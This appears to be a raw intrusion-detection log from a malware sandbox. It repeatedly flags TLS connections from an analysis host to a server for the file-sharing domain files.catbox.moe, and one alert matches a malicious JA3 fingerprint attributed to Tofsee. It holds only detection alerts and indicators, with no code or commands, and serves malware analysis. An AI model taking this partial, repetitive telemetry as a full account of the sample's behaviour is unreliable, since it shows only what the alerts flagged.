TCP 192.168.56.103:49501 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49359 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49456 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49274 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49354 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49504 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49301 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49367 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49296 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49360 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49343 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49300 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49404 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49398 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49506 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49279 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49284 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49321 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49336 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49432 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49450 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49443 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49435 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49283 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49269 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49494 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49466 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49483 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49455 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49382 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49414 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49291 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49371 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49493 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49286 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49461 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49303 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49388 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49500 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49355 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49381 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49319 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49340 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49299 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49423 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49216 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49295 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49308 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49350 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49396 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49412 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49497 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49434 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49480 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49485 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49259 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49422 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49363 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49444 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49482 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49270 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49498 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49499 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49448 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49387 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49408 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49215 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49364 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49193 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49341 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49421 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49311 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49417 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49317 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49257 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49325 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49377 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49411 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49337 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49475 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49222 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49304 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49369 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49508 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49248 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49320 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49370 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49449 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49268 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49454 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49495 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49345 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49236 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49273 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49211 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49218 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49247 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49491 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49203 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49219 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49272 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49313 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49457 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49438 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49503 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49245 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49374 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49267 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49512 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49462 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49512 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49243 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49302 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49425 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49427 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49323 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49385 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49204 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49463 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49347 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49332 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49502 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49487 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49471 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49322 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49233 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49327 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49234 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49330 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49209 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49424 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49328 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49446 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49405 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49507 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49476 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49240 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49331 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49379 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49394 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49263 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49294 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49426 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49473 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49307 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49429 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49459 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49470 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49373 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49318 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49440 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49252 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49409 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49250 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49348 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49467 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49477 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49315 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49221 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49258 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49334 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49231 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49361 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49352 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49289 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49264 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49201 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49290 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49335 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49439 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49346 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49447 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49489 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49306 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49468 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49235 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49430 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49278 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49395 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49224 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49436 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49351 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49281 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
